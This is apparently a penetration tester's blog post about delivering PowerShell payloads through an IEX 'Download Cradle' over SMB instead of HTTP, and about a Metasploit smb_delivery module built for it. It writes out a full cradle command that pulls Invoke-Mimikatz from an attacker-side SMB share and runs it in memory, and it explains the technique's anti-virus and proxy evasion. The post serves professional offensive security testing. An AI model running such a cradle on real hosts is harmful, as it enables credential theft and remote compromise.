PowerShell SMB Delivery
By Russel Van Tuyl
The PowerShell IEX “Download Cradle” is one of the top techniques I leverage when I have the ability to execute code on a host. This code execution typically takes place with something like PSexec.exe using recovered credentials, a successful SMBRelay attack, a malicious macro, or the payload of Java deserialization attack.
The Download Cradle leverages the PowerShell Invoke-Expression cmdlet that “Runs commands or expressions on the local computer.” The shorthand alias for the Invoke-Expression cmdlet is IEX. This functionality is used to create a new .Net Framework WebClient object and call the DownloadString method to download a resource. This method takes a Uniform Resource Identifier (URI) as input.
It is important to note that a URI is string that identifies a resource, the host where the resource can be found, and the method to access the resource. A Uniform Resource Locator (URL) is a subset of a URI and defines a resource accessible with the HTTP protocol. A good example of a URL is https://www.swordshield.com/blog/. The resource is can be found in the blog directory on the host at www.swordshield.com using the HTTPS protocol.
The DownloadString method is typically provided a URL, a type of URI, to download a PowerShell script into memory and can be used to keep from writing files to disk and evading anti-virus. An example of this would be to download the Invoke-Mimikatz script from the PowerSploit project and execute the script using this command:
IEX (New-Object Net.WebClient). DownloadString
This Download Cradle is extremely valuable and is used in tools such as Metasploit and Empire. The exploit/multi/script/web_delivery module can be leveraged to deliver a meterpreter agent to a target by providing the user with the Download Cradle code to execute on the target. After the module has been configured and executed, the Download Cradle will be printed to the screen. Copy this code and run it on a host and meterpreter agent will be delivered.
During a recent assessment I was having some problems with the Download Cradle. Every cradle I generated, no matter if it was manual creation or with Metasploit, failed to execute on the host. I was able to execute commands on the host, but when I executed the Download Cradle it never completed successfully. Now might be a good time to note that all of the tools and tutorials that I have seen to date use a URL with the Download Cradle. I was growing suspicious that the target host was running some type of anti-virus product that was also doing HTTP(S) inspection with something like a host-based web proxy.
I decided to take advantage of the fact that DownloadString method take a URI as an input. I manually stood up a SMB Share on my Kali Linux box and placed the payload file on the share. In addition to a URI, the DownloadString method will also accept a Universal Naming Convention (UNC) string. An example of a UNC string would be \\192.168.56.1\FileShare. I then executed the Download Cradle using an SMB URI like:
IEX (New-Object Net.WebClient).DownloadString(“\\192.168.1.145\data\Invoke-Mimikatz.ps1”);Invoke-Mimikatz
Sure enough, delivering the payload over SMB worked and I was no longer having trouble getting the commands to complete. Standing up the SMB server manual was a little tedious, but not too bad overall. I wanted to make the process quicker so that way I could just configure a module like the Metasploit Web Delivery module. What better way than to talk with Sword & Shield Security Analyst Andrew Smith, one of the authors of the Web Delivery module. Andrew quickly whipped up SMB Delivery module that can be used to circumvent instances when the HTTP(s) protocol isn’t working with the Download Cradle. The module has been published and is available in the current version of Metasploit. Here is a screenshot of the new smb_delivery module.
Like most Metasploit modules, it needs to configure it before executing. All of the settings are pretty straight forward. Note that Andrew built the module to support 2 target types: DLL and PSH. The first scenario covers the PSH (PowerShell) target. Below is an example configuration:
Now that the module is configured, it just needs to be run. Once the module has been executed, it will output the Download Cradle code that needs to be executed on your target host.
Alternatively, the module can be configured to execute a Windows Dynamic Link Library (DLL) file from a SMB share using the rundll32.exe program. To generate a DLL file, change the target to 0 and rename the file.
My next question is, what other URIs can be used with this Download Cradle? How many companies have an SMB proxy or inspect SMB traffic?
Russel Van Tuyl is a security analyst for Sword & Shield Enterprise Security. His primary role is conducting network vulnerability assessments and penetration tests but also performs web application assessments, firewall configuration audits, wireless assessments, and social engineering.
He has more than 10 years of experience in the technical field in roles such as database design, field device support, help desk, IT asset management, programming, and information security.